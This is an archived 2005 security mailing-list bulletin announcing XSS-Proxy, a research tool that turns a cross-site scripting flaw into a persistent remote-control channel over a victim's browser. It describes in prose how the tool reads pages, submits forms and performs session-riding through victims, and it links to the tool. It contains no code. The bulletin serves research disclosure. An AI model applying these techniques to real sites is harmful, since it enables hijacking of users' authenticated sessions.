Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[TOOL] XSS-Proxy - Remotely Controlling XSS Attacks

from [SecuriTeam] Network Security [Permanent Link]
Subject: [TOOL] XSS-Proxy - Remotely Controlling XSS Attacks
Date: 13 Feb 2005 19:07:57 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  XSS-Proxy - Remotely Controlling XSS Attacks
------------------------------------------------------------------------


SUMMARY



DETAILS

Rager Anton presented on this topic this past weekend at Shmoocon, but 
wanted to also brief the list on his persistent remote control XSS attack 
methods and a demonstration tool he has developed.

Anton has combined common XSS exploitation techniques with Javascript 
Remoting and Session-Riding to create an attack tool that uses an XSS 
vulnerable site (or sites), and a victim that loads our XSS vector, to 
create a remotely controlled, interactive, two-way attacker 
command/control channel to the victim. The PoC demonstration tool is 
called XSS-Proxy and is a lightweight, Perl based attacker tool that 
provides the command/control channel to a victim browser by translating 
attacker requests into victim Javascript and collecting/displaying victim 
results to the attacker.

This tool provides a persistent attacker command/control channel to the 
XSS'd victim and allows the attacker to provide additional commands to the 
victim with the victim forwarding readable document contents/results back 
to the attacker. It basically attack allows the attacker to drive the 
victim browser over the vulnerable site and perform most actions the 
victim could (like reading pages and submitting forms). The victim browser 
continues to loop and look for additional commands from the XSS-Proxy 
controller indefinitely, and can be controlled as long as we can keep the 
original XSS'd site window open - Anton calls these idling victims 
"Browser-Zombies".

We aren't just reading cookies anymore: we are requesting the victim load 
arbitrary documents off a target XSS'd server, submit forms (POST or GET) 
to XSS'd server and set/evaluate javascript vars/functions within the 
victim browser. This is useful for exploiting XSS vulnerable sites/users 
where cookies are not the primary mechanism for authentication by allowing 
an attacker to leverage trust relationships the victim may already have 
with target sites via cached authentication, client side certificate auth, 
IP access controls and perhaps even victims/targets behind firewalls. It 
is also possible to leverage this platform/attack for 
Cross-Site-Request-Forgery (CSRF) / Session-Riding attacks on non XSS 
vulnerable servers, multi-XSS site redirection (a list of sites to see if 
this user may have privs on), Masqueraded attacks on specific XSS 
vulnerable target servers (think Nikto thru someone-else's browser), MITM 
attacks on interactive victim windows and possibly even leverage CSRF 
traffic to look for other XSS flawed servers.

Anton has a draft white paper that provides more detail on the basic XSS 
based Javascript Remoting attack and outlines some approaches/details on 
methods for extending the attack even further at:  
<http://xss-proxy.sourceforge.net/Advanced_XSS_Control.txt> 
http://xss-proxy.sourceforge.net/Advanced_XSS_Control.txt. The XSS-Proxy 
demonstration tool is available at the project section of the same site ( 
<http://sourceforge.net/projects/xss-proxy> 
http://sourceforge.net/projects/xss-proxy). Anton's Shmoocon slides and 
links to additional primer information on XSS attacks can be found at  
<http://xss-proxy.sourceforge.net> http://xss-proxy.sourceforge.net

Anton doesn't regard himself as a WWW developer, therefore he believes he 
may have missed some other implications and/or more elegant ways of 
implementing this sort of attack, but the basic attack does work and the 
XSS-Proxy tool allows it to be explored more. Anton had a lot of positive 
feedback from Shmoocon, but he is very interested in other researcher 
feedback as well as other related ideas for extending persistent, 
intelligent and controlled XSS/Session-Riding/CSRF attacks.


ADDITIONAL INFORMATION

The information has been provided by  <mailto:arager@avaya.com> Rager, 
Anton (Anton).
The original article can be found at:  
<http://xss-proxy.sourceforge.net/Advanced_XSS_Control.txt> 
http://xss-proxy.sourceforge.net/Advanced_XSS_Control.txt
To keep updated with the tool visit the project's homepage at:  
<http://sourceforge.net/projects/xss-proxy> 
http://sourceforge.net/projects/xss-proxy



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [TOOL] XSS-Proxy - Remotely Controlling XSS Attacks, SecuriTeam <=
Previous by Date:  [UNIX] IBM AIX lspath Local File Access Vulnerability, SecuriTeam
Next by Date:  [REVS] Hold Your Sessions: An Attack on Java Session-id Geneartion, SecuriTeam
Previous by Thread:  [UNIX] IBM AIX lspath Local File Access Vulnerability, SecuriTeam
Next by Thread:  [REVS] Hold Your Sessions: An Attack on Java Session-id Geneartion, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]